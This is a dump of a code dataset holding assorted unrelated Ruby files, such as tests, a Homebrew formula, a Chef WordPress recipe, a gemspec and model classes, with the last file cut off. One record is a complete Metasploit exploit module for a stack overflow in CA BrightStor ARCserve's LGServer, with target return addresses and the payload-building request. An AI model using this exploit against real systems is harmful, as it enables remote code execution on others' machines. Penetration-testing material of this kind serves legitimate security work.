hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1) |
---|---|---|---|---|---|
387def986b5e63b279b556cdb6d4a0a5c11460d6 | 676 | require "spec_helper"
describe BazaModels::Model::Manipulation do
include DatabaseHelper
let(:user) { User.new(email: "[email protected]") }
let(:role_user) { Role.new(user: user, role: "user") }
let(:role_admin) { Role.new(user: user, role: "administrator") }
it "#created_at" do
expect(user.created_at).to eq nil
user.save!
expect(user.created_at).not_to eq nil
end
it "#updated_at" do
expect(user.updated_at).to eq nil
user.save!
expect(user.updated_at).not_to eq nil
old_updated_at = user.updated_at
sleep 1
user.email = "[email protected]"
user.save!
expect(user.updated_at).not_to eq old_updated_at
end
end
| 25.037037 | 66 | 0.689349 |
87c2fb01fe6542d4d8a74d9b1701d3694a22e317 | 1,715 | class HardlinkOsx < Formula
desc "Command-line utility that implements hardlinks on macOS"
homepage "https://github.com/selkhateeb/hardlink"
url "https://github.com/selkhateeb/hardlink/archive/v0.1.1.tar.gz"
sha256 "5876554e6dafb6627a94670ac33e750a7efeb3a5fbde5ede3e145cdb5131d1ba"
bottle do
sha256 cellar: :any_skip_relocation, mojave: "65636aa5d94437d15de5242711605a07fe6b3b3eebeb8753120555b2a0efe589"
sha256 cellar: :any_skip_relocation, high_sierra: "5d1dca9220c4955c4e4a3b05a23f9c241f9ea73a27ac78d967efdaf29f4d9730"
sha256 cellar: :any_skip_relocation, sierra: "01a3edbdac1385e04a3b0857e8073f0731ee26f6f71746a9c5347458aafc9623"
sha256 cellar: :any_skip_relocation, el_capitan: "edf85db2b0586c410dd96f8ab50cf4cc0f34d1494b3b91a5ef0b00ae16fed3c0"
sha256 cellar: :any_skip_relocation, yosemite: "dcba3e0320ca63d1b958173aa9e2ac24074c5c1f94becaba07f0c92e721b941e"
sha256 cellar: :any_skip_relocation, mavericks: "2ebdf76a67f7c63614d581963d92d79de15cf834b7e3857c139f474db71aab73"
end
def install
system "make"
bin.mkdir
system "make", "install", "PREFIX=#{prefix}"
end
def caveats
<<~EOS
Hardlinks cannot be created under the same directory root. If you try to
`hln` a source directory to a target directory under the same root, you will get an error!
Also, remember the binary is named `hln` due to a naming conflict.
EOS
end
test do
mkdir_p "test1/inner"
touch "test1/inner/file"
mkdir "otherdir"
system "#{bin}/hln", "test1", "otherdir/test2"
assert File.directory? "otherdir/test2"
assert File.directory? "otherdir/test2/inner"
assert File.file? "otherdir/test2/inner/file"
end
end
| 41.829268 | 120 | 0.769679 |
01d97f95f312873351971855f348c6eb1684d98a | 3,475 | require 'spec_helper'
require './spec/api_docs/image_hack'
resource "Users" do
let(:user) { users(:admin) }
let(:other_user) { users(:the_collaborator) }
before do
log_in user
end
get "/users" do
pagination
example_request "Get a list of users" do
status.should == 200
end
end
post "/users" do
parameter :username, "Username"
parameter :password, "Password - required unless LDAP authentication is enabled on the server"
parameter :first_name, "First Name"
parameter :last_name, "Last Name"
parameter :email, "E-mail"
parameter :title, "Title"
parameter :dept, "Department"
parameter :notes, "Notes"
parameter :admin, "Make the user an admin. (Only allowed if the authenticated user is an admin)"
required_parameters :username, :first_name, :last_name, :email
let(:username) { "cookiemonster" }
let(:first_name) { "Cookie" }
let(:last_name) { "Monster" }
let(:email) { "[email protected]" }
let(:password) { "secret" }
let(:title) { "Chief Cookie Officer" }
let(:dept) { "jar" }
let(:notes) { "great" }
example_request "Create a user" do
status.should == 201
end
end
get "/users/:id" do
parameter :id, "Id of a user"
required_parameters :id
let(:id) { other_user.id }
example_request "Get a user" do
status.should == 200
end
end
put "/users/:id" do
parameter :id, "Id of a user"
parameter :first_name, "First Name"
parameter :last_name, "Last Name"
parameter :email, "E-mail"
parameter :title, "Title"
parameter :dept, "Department"
parameter :notes, "Notes"
parameter :admin, "Make the user an admin. (Only allowed if the authenticated user is an admin)"
required_parameters :id, :first_name, :last_name, :email
let(:id) { other_user.id }
let(:first_name) { "Big" }
let(:last_name) { "Bird" }
let(:email) { "[email protected]" }
let(:title) { "Cookie manager1" }
let(:dept) { "jar1" }
let(:notes) { "great1" }
let(:admin) { "true" }
example_request "Update a user's details" do
status.should == 200
end
end
delete "/users/:id" do
parameter :id, "Id of a user"
required_parameters :id
let(:id) { other_user.id }
example_request "Delete a user" do
status.should == 200
end
end
get "/users/ldap" do
parameter :username, "Username"
required_parameters :username
let(:username) { other_user.username }
before do
stub(LdapClient).search.with_any_args { [other_user.attributes] }
end
example_request "Search for an LDAP user" do
explanation "This method only works if LDAP is enabled on the server"
status.should == 200
end
end
post "/users/:user_id/image" do
parameter :user_id, "Id of a user"
parameter :files, "Image file"
required_parameters :user_id
let(:user_id) { user.to_param }
let(:files) { [Rack::Test::UploadedFile.new(File.expand_path("spec/fixtures/small2.png", Rails.root), "image/png")] }
example_request "Update a user's profile image" do
status.should == 200
end
end
get "/users/:user_id/image" do
let(:user_id) { users(:owner).to_param }
parameter :user_id, "Id of a user"
parameter :style, "Size of image ( original, icon )"
required_parameters :user_id
example_request "Get a user's profile image" do
status.should == 200
end
end
end
| 24.821429 | 121 | 0.641727 |
f7492be5ef09455216cfb8a8fb9a1d73433ffa12 | 84 | # frozen_string_literal: true
class <%= class_name %>Cache < ApplicationCache
end
| 14 | 47 | 0.761905 |
ff4e654f26993edee508d4f016c91db3a3c4e4af | 2,282 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an
attacker could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-3216' ],
[ 'OSVDB', '35329' ],
[ 'BID', '24348' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2003 SP0 English', { 'Ret' => 0x71ae1f9b } ],
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
],
'DisclosureDate' => 'Jun 6 2007',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(1900) ], self.class)
end
def check
connect
sock.put("0000000019rxrGetServerVersion")
ver = sock.get_once
disconnect
if ( ver and ver =~ /11\.1\.742/ )
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
data = rand_text_alpha_upper(4108) + [target.ret].pack('V')
data << payload.encoded + rand_text_alpha_upper(rand(300) + 1)
sploit = "0000004820" # Command Length Field
sploit << "rxsUseLicenseIni" # RPC Command
sploit << "~~" # Constant Argument Delimiter
sploit << data
print_status("Trying target #{target.name}...")
# One-shot overwrite...
sock.put(sploit)
handler
disconnect
end
end
| 26.229885 | 104 | 0.563979 |
7ac3b5e151ddb80df64fb1cd5d5f24132e60bd2f | 3,034 | module RComposite
# Layer mode constants
# Some of Photoshop's layer modes are directly equivalent to RMagick's,
# some are not, and some aren't supported at all.
Normal = Magick::OverCompositeOp # PS equivalent
Dissolve = Magick::DissolveCompositeOp
Darken = Magick::DarkenCompositeOp # PS equivalent
Multiply = Magick::MultiplyCompositeOp # PS equivalent
#ColorBurn
#LinearBurn
Lighten = Magick::LightenCompositeOp # PS equivalent
Screen = Magick::ScreenCompositeOp # PS equivalent
#ColorDodge
#LinearDodge
Overlay = Magick::OverlayCompositeOp # PS equivalent
#SoftLight
#HardLight
#VividLight
#LinearLight
#PinLight
#HardMix
Difference = Magick::DifferenceCompositeOp # PS equivalent
#Exclusion
Hue = Magick::HueCompositeOp
Saturation = Magick::SaturateCompositeOp
Color = Magick::ColorizeCompositeOp
Luminosity = Magick::LuminizeCompositeOp
class Layer
attr_accessor :image
attr_reader :offset_x, :offset_y
def initialize(options = {})
if options[:file]
@image = Magick::Image.read(options[:file]).first
@image.background_color = 'transparent'
elsif options[:blob]
@image = Magick::Image.from_blob(options[:blob]).first
@image.background_color = 'transparent'
elsif options[:image]
if options[:image].is_a? Magick::Image
@image = options[:image]
end
end
if @image
#@image.matte = true
@mode = Normal
@offset_x = 0
@offset_y = 0
@opacity_percent = 100
@layer_mask = nil
else
raise "Layer not created -- no layer source."
end
end
def layer_mask(options, &block)
@layer_mask = LayerMask.new options
@layer_mask.instance_eval &block if block_given?
end
def merge_down(image)
@layer_mask.apply self if @layer_mask
image.composite!(@image, @offset_x, @offset_y, @mode)
end
def width
@image.columns
end
def height
@image.rows
end
def offset(x, y)
@offset_x = x
@offset_y = y
end
def rotate(degrees)
@image.rotate!(degrees)
end
def opacity(percent)
@opacity_percent = percent
# intercept original alpha channel with pixel intensity
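# (Added note, not in the original source: the mask built below is a solid grey
# image whose intensity is MaxRGB * percent/100; it is multiplied into the
# negated alpha data and then copied back as the layer's opacity, so `percent`
# scales the layer's existing alpha values.)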
alpha_channel = @image.channel(Magick::AlphaChannel).negate
intensity = (Magick::MaxRGB * (percent/100.0)).round
alpha_channel.composite!(Magick::Image.new(width, height) { self.background_color = Magick::Pixel.new(intensity,intensity,intensity) }, Magick::CenterGravity, Multiply)
alpha_channel.matte = false
@image.composite!(alpha_channel, Magick::CenterGravity, Magick::CopyOpacityCompositeOp)
return true
end
def mode(mode = nil)
return @mode if mode.nil?
@mode = mode
end
def save_as(filename)
@image.write(filename)
end
def join_set(set)
set.add_layer(self)
end
def leave_set(set)
set.remove_layer(self)
end
end
end
| 25.495798 | 174 | 0.659196 |
f794ce1ff8dc0cfd4fc7790bf6d33c6c70efc852 | 727 | # frozen_string_literal: true
unified_mode true
property :purge_chefdk, [true, false], default: true, description: 'Flag if the chefdk package should be purged before installing chef workstation'
property :add_default_chef_repo, [true, false], default: false, description: 'Flag if the default repo should be added using the codenamephp_chef_repository resource with default parameters'
action :install do
package 'purge chefdk' do
package_name 'chefdk'
action :purge
only_if { new_resource.purge_chefdk }
end
codenamephp_chef_repository 'add chef repository' do
only_if { new_resource.add_default_chef_repo }
end
package 'install chef-workstation' do
package_name 'chef-workstation'
end
end
| 34.619048 | 190 | 0.781293 |
019e6b0f2d808f79146bd28ec15653221640b163 | 2,493 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
include_recipe 'apache2'
include_recipe 'apache2::security-config'
include_recipe 'apache2::rm-index'
include_recipe 'mysql'
include_recipe 'php7'
include_recipe 'php7::module_libapache2'
include_recipe 'php7::module_mysql'
include_recipe 'php7::module_xml'
remote_file '/tmp/wp-cli.phar' do
source node['wordpress']['cli']['url']
action :create
end
# Reference: http://wp-cli.org/#installing
bash 'configure wp cli' do
cwd '/tmp'
code <<-EOH
# Change permissions on the wp-cli.phar file for manipulation
chmod +x wp-cli.phar
# Move wp-cli.phar to complete installation
mv wp-cli.phar /usr/local/bin/wp
EOH
end
execute 'download wordpress' do
cwd '/var/www/html'
command <<-EOH
wp core download \
--version=${version} \
--path=/var/www/html \
--allow-root
EOH
environment({ 'version' => node['wordpress']['version'] })
live_stream true
end
execute 'chown wordpress home' do
command 'chown -R ${user}:${user} /var/www/html'
environment({ 'user' => node['wordpress']['user'] })
end
execute 'create wordpress database' do
command 'mysql -u root -e "CREATE DATABASE ${dbname}"'
environment({ 'dbname' => node['wordpress']['db']['name'] })
end
execute 'a2enmods' do
command 'a2enmod rewrite proxy_fcgi setenvif'
end
execute 'a2enconfs' do
command 'a2enconf php7.0-fpm'
end
template '/etc/apache2/sites-available/wordpress.conf' do
source 'wordpress.conf.erb'
end
execute 'enable wordpress.conf' do
command 'a2ensite wordpress'
end
bash 'edit php.ini' do
user 'root'
code <<-EOH
sed -i 's/memory_limit = .*/memory_limit = 128M/' /etc/php/*/apache2/php.ini
sed -i 's/upload_max_filesize = .*/upload_max_filesize = 100M/' /etc/php/*/apache2/php.ini
sed -i 's/post_max_size = .*/post_max_size = 100M/' /etc/php/*/apache2/php.ini
sed -i 's/max_execution_time = .*/max_execution_time = 120/' /etc/php/*/apache2/php.ini
EOH
end
| 28.329545 | 94 | 0.711592 |
1881ff34aa3f523f0cc8eacafc64c443fb5cd3bd | 7,495 | class SearchStatistic
include Mongoid::Document
include Mongoid::Timestamps
# Search Statistics aggregate a single hour's
# worth of search queries for a single database
#
# This follows a denormalized star schema, with
# a database dimension, a date dimension, and
# a fact table populated by search_queries
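#
# Illustrative sketch (added, not part of the original file): the hourly rollup
# is usually driven from a scheduled task, roughly like
#
#   SearchStatistic.calculate   # builds one statistic per elapsed hour,
#                               # looping until #up_to_date? is satisfied
#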
field :interval_end, type: DateTime
###################################
# Date Dimension Attributes
###################################
field :year, type: Integer
field :month, type: Integer
field :day, type: Integer
field :hour, type: Integer
field :weekday, type: Integer
###################################
# Database Dimension Attribute
###################################
field :db, type: String
###################################
# Facts
###################################
#
# Number of searches during the interval, by result type
field :n_searches, type: Integer, default: 0 # total number of searches
field :n_zero_result, type: Integer, default: 0 # zero-result searches
field :n_limit_result, type: Integer, default: 0 # searches which hit the limit
#
# Total results during the interval
field :total_results, type: Integer, default: 0 # total results returned by all queries
#
# Aggregate runtime statistics
field :total_time, type: Integer, default: 0
field :max_time, type: Integer, default: 0
#
# Number of searches during the interval, by run time
field :n_time_gt_1s, type: Integer, default: 0 # runtime > 1 second
field :n_time_gt_10s, type: Integer, default: 0 # runtime > 10 seconds
field :n_time_gt_60s, type: Integer, default: 0 # runtime > 1 minute
#
# Number of searches during the interval, by search criteria
field :n_ln, type: Integer, default: 0 # surname searches
field :n_fn, type: Integer, default: 0 # forename searches
field :n_place, type: Integer, default: 0 # specific place searches
field :n_nearby, type: Integer, default: 0 # radius searches
field :n_fuzzy, type: Integer, default: 0 # soundex searches
field :n_inclusive, type: Integer, default: 0 # search additional family member names
field :n_0_county, type: Integer, default: 0 # blank county
field :n_1_county, type: Integer, default: 0 # county (exactly 1)
field :n_multi_county, type: Integer, default: 0 # county (more than 1)
field :n_date, type: Integer, default: 0 # date range
field :n_r_type, type: Integer, default: 0 # record type
index({ interval_end: -1})
index({ year: 1, month: 1, day: 1},{name: "year_month_day",background: true })
def self.calculate
@this_database = self.this_db
num = 0
logger.info 'calculate nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn'
until self.up_to_date?
logger.info 'looping'
stat = SearchStatistic.new
stat.populate
stat.save!
logger.info "stat #{stat.inspect}"
num += 1
#break if num == 2
end
end
def self.up_to_date?
logger.info 'up to date'
freshest_stat_date = SearchStatistic.new.terminus_ad_quem
logger.info "freshest #{freshest_stat_date.inspect}"
last_midnight = Time.utc(Time.now.year, Time.now.month, Time.now.day)
logger.info "last #{last_midnight.inspect}"
result = freshest_stat_date > last_midnight
logger.info "result #{result}"
result
end
def process_query(query)
logger.info 'process_query'
self.n_searches += 1
self.n_zero_result += 1 if query.result_count == 0
self.n_limit_result += 1 if query.result_count == FreeregOptionsConstants::MAXIMUM_NUMBER_OF_RESULTS
self.total_results += (query.result_count || 0)
self.total_time += (query.runtime||0)
self.max_time = query.runtime if (query.runtime||0) > self.max_time
self.n_time_gt_1s += 1 if (query.runtime||0) > 1000
self.n_time_gt_10s += 1 if (query.runtime||0) > 10000
self.n_time_gt_60s += 1 if (query.runtime||0) > 60000
self.n_ln += 1 unless query.last_name.blank?
self.n_fn += 1 unless query.first_name.blank?
self.n_place += 1 unless query.places.empty?
self.n_nearby += 1 if query.search_nearby_places
self.n_fuzzy += 1 if query.fuzzy
self.n_inclusive += 1 if query.inclusive
self.n_0_county += 1 if query.chapman_codes.empty?
self.n_1_county += 1 if query.chapman_codes.size == 1
self.n_multi_county += 1 if query.chapman_codes.size > 1
self.n_date += 1 if query.start_year || query.end_year
self.n_r_type += 1 unless query.record_type.blank?
end
def populate
logger.info 'populate'
populate_dimension
populate_facts
end
def populate_dimension
logger.info 'populate_dimension'
logger.info "Quem @ #{ @terminus_ad_quem.inspect}"
self.db = @this_database
self.year = terminus_ad_quem.year
self.month = terminus_ad_quem.month
self.day = terminus_ad_quem.day
self.hour = terminus_ad_quem.hour
self.weekday = terminus_ad_quem.wday
self.interval_end = terminus_ad_quem
logger.info "pop dim #{self.inspect}"
end
def populate_facts
logger.info 'populate_facts'
matching_queries.each do |q|
process_query(q)
end
end
def matching_queries
logger.info 'matching_queries'
SearchQuery.between(:c_at => terminus_a_quo..terminus_ad_quem)
end
def terminus_ad_quem
logger.info 'terminus_ad_quem'
# increment terminus a quo by 1 hour
@terminus_ad_quem ||= next_hour(terminus_a_quo)
logger.info "Quem class#{@terminus_ad_quem.class.inspect}"
logger.info "Quem #{@terminus_ad_quem}"
@terminus_ad_quem
end
def terminus_a_quo
logger.info 'terminus_a_quo'
# find most recent search_statistic for this database
@terminus_a_quo ||= most_recent_statistic_date || earliest_search_query_date
logger.info "Quo class#{@terminus_a_quo.class.inspect}"
logger.info "Quo #{@terminus_a_quo.inspect}"
@terminus_a_quo
end
def next_hour(prev_datetime)
logger.info 'next_hour'
logger.info "OLd class#{prev_datetime.class.inspect}"
logger.info "OLd #{prev_datetime.inspect}"
new_time = Time.utc(prev_datetime.year, prev_datetime.month, prev_datetime.day, prev_datetime.hour + 1, 0, 0)
logger.info "new time class#{new_time.class.inspect}"
logger.info "new #{new_time.inspect}"
new_time
end
def earliest_search_query_date
logger.info 'earliest_search_query_date'
result = SearchQuery.where(:c_at.ne => nil).asc(:c_at).first.created_at
logger.info "created at class#{result.class.inspect}"
logger.info "created at#{result.inspect}"
result
end
def most_recent_statistic_date
logger.info 'most_recent_statistic_date'
stat = SearchStatistic.where(db: @this_database).asc(:interval_end).last
logger.info "recent stat #{stat.inspect}"
logger.info "interval_end class#{stat.interval_end.class.inspect}" if stat.present?
stat ? stat.interval_end : nil
end
def self.this_db
logger.info 'this_db'
db = Mongoid.clients[SearchQuery.storage_options[:client]][:database]
host = Mongoid.clients[SearchQuery.storage_options[:client]][:hosts].first
if host.match(/localhost/) # most servers use identical mongoid.yml config files
"#{Socket.gethostname}/#{db}"
else
"#{host}/#{db}"
end
end
end
| 35.187793 | 113 | 0.673249 |
8725edee5e76561791613ab8116e7599027e4ff1 | 377 | module Steroids
module Base
class Class
include Steroids::Concerns::Error
class << self
def inherited(subclass)
instance_variables.each do |var|
subclass_variable_value = instance_variable_get(var).dup
subclass.instance_variable_set(var, subclass_variable_value)
end
end
end
end
end
end
| 23.5625 | 72 | 0.639257 |
397184975f5119735be1b43e649f6697ee8b6152 | 1,330 | # Encoding: utf-8
#
# This is auto-generated code, changes will be overwritten.
#
# Copyright:: Copyright 2018, Google Inc. All Rights Reserved.
# License:: Licensed under the Apache License, Version 2.0.
#
# Code generated by AdsCommon library 1.0.1 on 2018-09-20 09:47:26.
require 'ads_common/savon_service'
require 'adwords_api/v201809/feed_item_service_registry'
module AdwordsApi; module V201809; module FeedItemService
class FeedItemService < AdsCommon::SavonService
def initialize(config, endpoint)
namespace = 'https://adwords.google.com/api/adwords/cm/v201809'
super(config, endpoint, namespace, :v201809)
end
def get(*args, &block)
return execute_action('get', args, &block)
end
def get_to_xml(*args)
return get_soap_xml('get', args)
end
def mutate(*args, &block)
return execute_action('mutate', args, &block)
end
def mutate_to_xml(*args)
return get_soap_xml('mutate', args)
end
def query(*args, &block)
return execute_action('query', args, &block)
end
def query_to_xml(*args)
return get_soap_xml('query', args)
end
private
def get_service_registry()
return FeedItemServiceRegistry
end
def get_module()
return AdwordsApi::V201809::FeedItemService
end
end
end; end; end
| 24.181818 | 69 | 0.692481 |
87c33b97eefe68533f1bcd8255704470f912d2fd | 2,130 | =begin
#DocuSign REST API
#The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SwaggerClient::AccountBillingPlanResponse
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'AccountBillingPlanResponse' do
before do
# run before each test
@instance = SwaggerClient::AccountBillingPlanResponse.new
end
after do
# run after each test
end
describe 'test an instance of AccountBillingPlanResponse' do
it 'should create an instance of AccountBillingPlanResponse' do
expect(@instance).to be_instance_of(SwaggerClient::AccountBillingPlanResponse)
end
end
describe 'test attribute "billing_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "billing_address_is_credit_card_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "billing_plan"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "credit_card_information"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "referral_information"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "successor_plans"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 29.583333 | 123 | 0.742723 |
e975233ab3e74957f7ba76842d35e23e5a448d6e | 2,564 | # -*- encoding: utf-8 -*-
# stub: guard 2.13.0 ruby lib
Gem::Specification.new do |s|
s.name = "guard".freeze
s.version = "2.13.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Thibaud Guillaume-Gentil".freeze]
s.date = "2015-07-27"
s.description = "Guard is a command line tool to easily handle events on file system modifications.".freeze
s.email = ["[email protected]".freeze]
s.executables = ["guard".freeze, "_guard-core".freeze]
s.files = ["bin/_guard-core".freeze, "bin/guard".freeze]
s.homepage = "http://guardgem.org".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3".freeze)
s.rubygems_version = "3.1.0.pre1".freeze
s.summary = "Guard keeps an eye on your file modifications".freeze
s.installed_by_version = "3.1.0.pre1" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<thor>.freeze, [">= 0.18.1"])
s.add_runtime_dependency(%q<listen>.freeze, [">= 2.7", "<= 4.0"])
s.add_runtime_dependency(%q<pry>.freeze, [">= 0.9.12"])
s.add_runtime_dependency(%q<lumberjack>.freeze, ["~> 1.0"])
s.add_runtime_dependency(%q<formatador>.freeze, [">= 0.2.4"])
s.add_runtime_dependency(%q<nenv>.freeze, ["~> 0.1"])
s.add_runtime_dependency(%q<shellany>.freeze, ["~> 0.0"])
s.add_runtime_dependency(%q<notiffany>.freeze, ["~> 0.0"])
else
s.add_dependency(%q<thor>.freeze, [">= 0.18.1"])
s.add_dependency(%q<listen>.freeze, [">= 2.7", "<= 4.0"])
s.add_dependency(%q<pry>.freeze, [">= 0.9.12"])
s.add_dependency(%q<lumberjack>.freeze, ["~> 1.0"])
s.add_dependency(%q<formatador>.freeze, [">= 0.2.4"])
s.add_dependency(%q<nenv>.freeze, ["~> 0.1"])
s.add_dependency(%q<shellany>.freeze, ["~> 0.0"])
s.add_dependency(%q<notiffany>.freeze, ["~> 0.0"])
end
else
s.add_dependency(%q<thor>.freeze, [">= 0.18.1"])
s.add_dependency(%q<listen>.freeze, [">= 2.7", "<= 4.0"])
s.add_dependency(%q<pry>.freeze, [">= 0.9.12"])
s.add_dependency(%q<lumberjack>.freeze, ["~> 1.0"])
s.add_dependency(%q<formatador>.freeze, [">= 0.2.4"])
s.add_dependency(%q<nenv>.freeze, ["~> 0.1"])
s.add_dependency(%q<shellany>.freeze, ["~> 0.0"])
s.add_dependency(%q<notiffany>.freeze, ["~> 0.0"])
end
end
| 44.982456 | 112 | 0.631435 |
1d6b39a7831d44d28299d0e174681f7e82266024 | 7,903 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Ci::Reports::TestSuite do
include TestReportsHelper
let(:test_suite) { described_class.new('Rspec') }
let(:test_case_success) { create_test_case_rspec_success }
let(:test_case_failed) { create_test_case_rspec_failed }
let(:test_case_skipped) { create_test_case_rspec_skipped }
let(:test_case_error) { create_test_case_rspec_error }
it { expect(test_suite.name).to eq('Rspec') }
describe '#add_test_case' do
context 'when status of the test case is success' do
it 'stores data correctly' do
test_suite.add_test_case(test_case_success)
expect(test_suite.test_cases[test_case_success.status][test_case_success.key])
.to eq(test_case_success)
expect(test_suite.total_time).to eq(1.11)
end
end
context 'when status of the test case is failed' do
it 'stores data correctly' do
test_suite.add_test_case(test_case_failed)
expect(test_suite.test_cases[test_case_failed.status][test_case_failed.key])
.to eq(test_case_failed)
expect(test_suite.total_time).to eq(2.22)
end
end
context 'when two test cases are added' do
it 'sums up total time' do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
expect(test_suite.total_time).to eq(3.33)
end
end
end
describe '#total_count' do
subject { test_suite.total_count }
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
test_suite.add_test_case(test_case_skipped)
test_suite.add_test_case(test_case_error)
end
it { is_expected.to eq(4) }
end
describe '#total_status' do
subject { test_suite.total_status }
context 'when all test cases succeeded' do
before do
test_suite.add_test_case(test_case_success)
end
it { is_expected.to eq(Gitlab::Ci::Reports::TestCase::STATUS_SUCCESS) }
end
context 'when a test case failed' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
end
it { is_expected.to eq(Gitlab::Ci::Reports::TestCase::STATUS_FAILED) }
end
context 'when a test case errored' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_error)
end
it { is_expected.to eq(Gitlab::Ci::Reports::TestCase::STATUS_FAILED) }
end
end
describe '#with_attachment' do
subject { test_suite.with_attachment! }
context 'when test cases do not contain an attachment' do
let(:test_case) { build(:report_test_case, :failed)}
before do
test_suite.add_test_case(test_case)
end
it 'returns an empty hash' do
expect(subject).to be_empty
end
end
context 'when test cases contain an attachment' do
let(:test_case_with_attachment) { build(:report_test_case, :failed_with_attachment)}
before do
test_suite.add_test_case(test_case_with_attachment)
end
it 'returns failed test cases with attachment' do
expect(subject.count).to eq(1)
expect(subject['failed']).to be_present
end
end
end
describe '#set_suite_error' do
let(:set_suite_error) { test_suite.set_suite_error('message') }
context 'when @suite_error is nil' do
it 'returns message' do
expect(set_suite_error).to eq('message')
end
it 'sets the new message' do
set_suite_error
expect(test_suite.suite_error).to eq('message')
end
end
context 'when a suite_error has already been set' do
before do
test_suite.set_suite_error('old message')
end
it 'overwrites the existing message' do
expect { set_suite_error }.to change(test_suite, :suite_error).from('old message').to('message')
end
end
end
describe '#+' do
let(:test_suite_2) { described_class.new('Rspec') }
subject { test_suite + test_suite_2 }
context 'when adding multiple suites together' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
end
it 'returns a new test suite' do
expect(subject).to be_an_instance_of(described_class)
end
it 'returns the suite name' do
expect(subject.name).to eq('Rspec')
end
it 'returns the sum for total_time' do
expect(subject.total_time).to eq(3.33)
end
it 'merges tests cases hash', :aggregate_failures do
test_suite_2.add_test_case(create_test_case_java_success)
failed_keys = test_suite.test_cases['failed'].keys
success_keys = test_suite.test_cases['success'].keys + test_suite_2.test_cases['success'].keys
expect(subject.test_cases['failed'].keys).to contain_exactly(*failed_keys)
expect(subject.test_cases['success'].keys).to contain_exactly(*success_keys)
end
end
end
describe '#sorted' do
subject { test_suite.sorted }
context 'when there are multiple failed test cases' do
before do
test_suite.add_test_case(create_test_case_rspec_failed('test_spec_1', 1.11))
test_suite.add_test_case(create_test_case_rspec_failed('test_spec_2', 4.44))
end
it 'returns test cases sorted by execution time desc' do
expect(subject.test_cases['failed'].each_value.first.execution_time).to eq(4.44)
expect(subject.test_cases['failed'].values.second.execution_time).to eq(1.11)
end
end
context 'when there are multiple test cases' do
let(:status_ordered) { %w(error failed success skipped) }
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
test_suite.add_test_case(test_case_error)
test_suite.add_test_case(test_case_skipped)
end
it 'returns test cases sorted by status' do
expect(subject.test_cases.keys).to eq(status_ordered)
end
end
end
Gitlab::Ci::Reports::TestCase::STATUS_TYPES.each do |status_type|
describe "##{status_type}" do
subject { test_suite.public_send("#{status_type}") }
context "when #{status_type} test case exists" do
before do
test_suite.add_test_case(public_send("test_case_#{status_type}"))
end
it 'returns all success test cases' do
is_expected.to eq( { public_send("test_case_#{status_type}").key => public_send("test_case_#{status_type}") })
end
end
context "when #{status_type} test case do not exist" do
it 'returns nothing' do
is_expected.to be_empty
end
end
end
end
describe '#each_test_case' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
test_suite.add_test_case(test_case_skipped)
test_suite.add_test_case(test_case_error)
end
it 'yields each test case to given block' do
